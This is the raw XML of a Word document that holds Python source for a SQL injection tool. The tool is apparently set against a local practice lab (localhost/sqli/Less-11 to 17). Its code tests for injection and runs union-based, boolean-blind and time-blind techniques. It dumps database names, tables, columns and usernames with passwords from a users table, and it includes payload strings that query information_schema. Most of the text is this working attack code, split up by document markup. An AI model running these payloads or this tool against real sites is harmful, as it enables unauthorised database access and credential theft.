        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,0x3a,password)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7BBC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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB17B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%20from%20users%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF95BD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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845F05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 xml:space="preserve">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7E224F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0555063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29DD21A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23611F8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 = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600303F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0])[1].split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1])[0].split(',')  # #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBDB9E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E521C7" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4D9FF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do_sql_inject_un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78FF9EC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colored('Welcome to SQL Injection Tool', 'blue'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BFB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colored('Start Checking for SQL Injection.........', 'red'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7BE09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, symbol = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can_injec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07644E5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not result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D14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Target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does not exist SQL Injection -&gt; Exit')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0261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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1782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62CBA98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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('%') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A328B9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Test Order By And Union Select........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021502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symbol == 'integer':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590BF80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Test Integer........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35F51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2007313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Cannot use keyword Union........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF7F2F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turn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931658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lag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_order_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by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17106D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35FA0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test_union_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>selec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flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC59CE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xcept </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512068B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Cannot use keyword Union........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EDE0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turn 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49784AF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base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bas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26E0EE2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version = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exec_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>functio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, 'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1E054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his_database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exec_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>functio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, 'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD088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Success -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() + ' ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>version.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBE79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Database -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EFBA6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tables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table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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF229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Tables -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EC98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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536359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umns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column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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB354E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Columns -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CDD05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Try to get Data........\n\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF744C" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DD72C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58884C9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not data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE83E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turn 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4759A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temp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584878E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%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52DFCD" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5960A9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meta in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C636C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temp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meta.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F58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%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DA1D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6BA71FA1" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057551DD" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D22DD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do_sql_injection_special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1A34EDB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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool_based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7B914FB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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10AB0B17" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD51BB2" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669420D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do_time_based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5BBC427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ime_based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604E2305" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A27093" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C597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f __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51561E3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bannerart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1854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-------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F2230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MASSIVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3756C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_____ _____ __    _     _____</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65080A5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|   __|     |  |  |_|___|   __|___ ___ ___ ___ ___ ___</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0080CE5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|__   |  |  |  |__| |___|__   |  _| .'|   |   | -_|  _|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877F42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|_____|__  _|_____|_|   |_____|___|__,|_|_|_|_|___|_|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE909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|__|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E42B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           </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AlanK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7832D12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-------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508EC17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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA125F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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bannerart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B050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less = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C6DC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= 'http://localhost/sqli/Less-' + str(less) + '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D3B4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while less &lt;= 17:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7B23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\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nScanning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Less-' + str(less))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABB96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less &lt;= 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F44F5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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0 !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_sql_inject_union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('http://localhost/sqli/Less-' + str(less) + '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=1'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05950C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less += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4211792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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336123F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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD4B9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a = (BeautifulSoup(send_request(url),'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html.parser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>').find_all('font')[2].text).find("You are in")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0339B4A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b = (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'%27'),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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>find_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('font')[2].text).find("You are in")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D51C0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a == b == 0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A00CF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"time blind")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E058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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_time_based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02C5A1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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5107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"bool blind")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6AE8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judge = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_sql_injection_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>special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'http://localhost/sqli/Less-' + str(less) + '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2727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3CAD4D9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print("post")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85787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do_injection_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>post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'http://localhost/sqli/Less-' + str(less) + '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B16F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less += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5CE23E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="3F601634" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>Gets/bool_based.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64408CC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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65778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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA62EB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termcolor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import colored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685BB5D7" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215BE741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# </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC35C89" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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list(set(chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).lower</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">()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range(32, 127)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1EF41" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D045146" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AEE14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def log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504CAD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time.strftime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('%H:%H:%S', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.local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ime.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E66B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colored('[' + str(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>) + '] ', 'green') + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B60B32" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D8823C" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2809286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dbs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0260449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url.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('?')[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42337B9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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A296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= "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B420F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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360E8C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"&gt;Scanning databases with Bool......")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE5C8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40):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C173A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027E8CC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exp = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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schema_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEAC63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"from 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schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> limit 0,1),{0},1)={1}--+".format(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, ascii(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C320B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 xml:space="preserve"> = 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exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB238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print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4C1F1FC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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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6113DDE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normalContextLen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 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r.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5235C0D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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334AA1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dbs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dbs.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EED7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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28996486" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB21E2E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3C98B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tables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22BB5B5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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB7DD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= "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36081A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bs = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6748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"&gt;Scanning tables...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77108C5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00):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E411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5884763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exp = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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) " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB744E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"from 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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
